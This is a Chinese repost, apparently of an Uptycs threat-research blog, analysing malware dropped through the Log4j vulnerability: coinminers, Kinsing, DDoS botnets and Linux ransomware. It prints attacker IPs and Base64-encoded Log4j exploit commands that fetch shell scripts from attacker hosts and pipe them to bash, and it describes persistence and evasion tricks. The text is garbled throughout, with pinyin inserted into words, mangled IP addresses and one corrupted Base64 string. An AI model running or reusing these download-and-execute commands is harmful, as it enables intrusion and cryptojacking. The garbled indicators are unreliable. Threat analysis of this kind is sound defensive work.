盤點(diǎn)：Log4j漏洞帶來的深遠(yuǎn)影響

上周，Log4j 漏洞顛覆了互聯(lián)網(wǎng)，影響是巨大。攻擊者也已經(jīng)開始利用該漏，到目前為止，Uptycs 研究人員已經(jīng)觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關(guān)的攻擊，這些攻擊積極利用了此漏洞。

未來幾天勒索軟件攻擊的規(guī)?？赡軙?huì)增加。由于該漏洞非常嚴(yán)重，因此可能還會(huì)發(fā)現(xiàn)一些可以繞過當(dāng)前補(bǔ)丁級(jí)別或修復(fù)程序的變體。因針對(duì)這種攻擊持續(xù)監(jiān)控和強(qiáng)化系統(tǒng)是極其重要的。

Uptycs 此前在博客中為其客戶分享了有關(guān)補(bǔ)救和檢測步驟的詳細(xì)信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團(tuán)隊(duì)確定了投放在易受攻擊的服務(wù)器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件，如 Kinsing 和 Xmrig coinminers，以及 Dofloo、Tsunami 和 Mirai 僵尸網(wǎng)絡(luò)惡意軟件。除了這些惡意軟件系列，攻擊者已經(jīng)開始在在易受CVE-2021-44228服務(wù)器上部署勒索軟件。

1. Xmrig

Xmrig 是一個(gè)開源的 Monero CPU Miner，用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后，攻擊者試圖運(yùn)行惡意 shell 腳本，其中包含下載 xmrig 礦工的命令。

命令是 93.189.42 8 []：5557，/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。

此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6

shell 腳本(見圖 1)首先殺死已經(jīng)在運(yùn)行的礦工二進(jìn)制文件，然后從互聯(lián)網(wǎng)下載 xmrig 礦工二進(jìn)制文件并運(yùn)行它。

圖 1：Shell 腳本下載并執(zhí)行 Xmrig

2. Kinsing

Kinsing 是一種自我傳播的加密挖掘惡意軟件，以前針對(duì)配置錯(cuò)誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的，通常是通過惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規(guī)避技術(shù)，如 setfacl 使用、chattr 使用、日志刪除命令等。

大規(guī)模掃描后的攻擊者試圖在易受攻擊的服務(wù)器上放置 kinsing 二進(jìn)制文件。攻擊者用來刪除和運(yùn)行 shell 腳本的：92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.

在shell腳本：7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中，我們可以看到攻擊者在 shell 腳本運(yùn)行時(shí)放置了刪除 kinsing 惡意軟件二進(jìn)制文件的命令(見圖 2)。

圖 2：通過 shell 腳本下載 Kinsing

kinsing shell 腳本還包含與 docker 相關(guān)的命令，這些命令會(huì)殺死受害系統(tǒng)上已經(jīng)運(yùn)行的礦工進(jìn)程(如果存在)。

圖 3：用于殺死已經(jīng)運(yùn)行的礦工的 docker 命令

3. DDoS 僵尸網(wǎng)絡(luò)負(fù)載

在一些漏洞利用嘗試中，攻擊者試圖刪除分布式拒絕服務(wù) (DDoS) 惡意軟件二進(jìn)制文件，如 dofloo、Mirai。

4. Dofloo

Dofloo (又名 AeSDdos，flooder)是一種DDoS類型的惡意軟件，可對(duì)目標(biāo) IP 地址進(jìn)行各種泛洪攻擊，如 ICMP 和 TCP。除了泛洪攻擊外，Dofloo 通過操縱受害者系統(tǒng)中的 rc.local 文件來確保其持久性。它的一些變體在受害計(jì)算機(jī)上部署了加密貨幣礦工。

在情報(bào)系統(tǒng)中，攻擊者也在利用易受攻擊的服務(wù)器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []：1389，/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖(參見圖 4)顯示了 Dofloo 對(duì) rc.local 的操作：6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的變體。

圖 4：Dofloo 操作 rc.local

5. mushtik

海嘯(又名mushtik)是基于DDoSflooder一個(gè)跨平臺(tái)的惡意軟件，在下載文件過程中被感染系統(tǒng)中執(zhí)行shell的命令。海嘯樣本：4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性，它還刪除一個(gè)副本 /dev/shm/ 目錄作為防御規(guī)避策略(參見圖 5)。

圖 5：Tsunami 通過 cron 從 /dev/shm 運(yùn)行

6. Mirai

Mirai是一種惡意軟件，它感染在 ARC 處理器上運(yùn)行的智能設(shè)備，將它們變成一個(gè)遠(yuǎn)程控制的機(jī)器人網(wǎng)絡(luò)。Mirai 還通過惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實(shí)用程序從攻擊者 C2，62.210.130[.]250 中刪除 Mirai 惡意軟件(見圖 6)。

圖 6：從 C2 下載 mirai 的 Shell 腳本

7. Linux

攻擊者還利用 Log4j 漏洞在易受攻擊的服務(wù)器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件：5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的，并操縱 ssh 文件在受害者系統(tǒng)中傳播自身。攻擊者丟棄的贖金票據(jù)如下所示(見圖 7)。

圖 7：Linux 贖金說明

8. Uptycs EDR

Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進(jìn)程掃描的行為規(guī)則成功檢測到所有有效負(fù)載。下面顯示了我們的行為規(guī)則主動(dòng)檢測到的 Linux 勒索軟件的示例(參見圖 8)。

圖 8：使用 Uptycs EDR 檢測勒索軟件

9. Xmrig

除了行為規(guī)則之外，當(dāng) YARA 檢測被觸發(fā)時(shí)，Uptycs EDR 通過威脅研究團(tuán)隊(duì)策劃的 YARA 規(guī)則分配威脅配置文件。用戶可以導(dǎo)航到檢測警報(bào)中的工具包數(shù)據(jù)部分，然后單擊名稱以查找工具包的說明。Uptycs EDR 檢測到的 Xmrig 惡意軟件活動(dòng)的摘錄如下所示(見圖 9)。

圖 9：使用 Uptycs EDR 進(jìn)行 XMrig 檢測

標(biāo)題名稱：盤點(diǎn)：Log4j漏洞帶來的深遠(yuǎn)影響
網(wǎng)頁網(wǎng)址：http://bm7419.com/news/201854.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供電子商務(wù)、移動(dòng)網(wǎng)站建設(shè)、靜態(tài)網(wǎng)站、網(wǎng)站策劃、虛擬主機(jī)、面包屑導(dǎo)航

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)